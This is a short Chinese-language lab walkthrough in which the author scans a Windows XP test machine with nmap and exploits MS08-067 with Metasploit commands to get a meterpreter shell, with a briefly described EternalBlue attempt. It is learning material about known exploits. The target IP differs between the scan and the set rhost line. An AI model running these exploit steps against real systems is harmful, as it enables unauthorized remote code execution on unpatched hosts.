沒網閒着無聊,靈魂無處安放呀,就簡單的用metasploit玩玩。
實驗環境:
目標主機:Windows XP professional
攻擊機: kali linux
1.漏洞掃描
nmap --script=vuln 172.20.10.5
掃描結果提示,易受攻擊的有:
1.CVE-2008-4250 Microsoft Windows系統易受遠程代碼執行攻擊(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服務器中的遠程代碼執行漏洞(MS17-010)
以上述兩個爲例學習使用metasploit漏洞利用模塊進行攻擊:
2.漏洞利用
實例一:使用MS08-067模塊進行攻擊測試
命令:
啓動Metasploit:msfconsole
msf5 >:search ms08_067 /*查找可用的攻擊模塊*/
msf5 >:use exploit/windows/smb/ms08_067_netapi //使用模塊
輸入info 可用目標主機,本次環境目標爲34 ,設置目標環境set target 34
顯示payload 需要設置的項,如下圖需要設置目標主機,設置好後執行攻擊
msf5 >:set target 34 //設置目標主機的系統版本,防止語言導致攻擊失敗
msf5 >:show payload //顯示需要設置的項
msf5 >:set rhost 127.20.10.5 //設置目標主機Ip
msf5 >:exploit //執行攻擊
成功後meterpreter輸入shell即可遠程執行相關任務,查看用戶名等操作。
實例二:利用MS17-010進行攻擊測試,同裏查看可用的攻擊模塊
同樣的我們這次選用eternalblue smb遠程windows內核池破壞
設置好相關參數後開始執行攻擊,由於目標主機重啓後未激活,導致利用漏洞攻擊成功,但未能建立會話,目標主機正常啓動就能成功建立會話。
系統未激活導致無法進入,建立連接。
總體來說在漏洞測試方面,metasploit是非常強,簡單高效的操作提高工作效率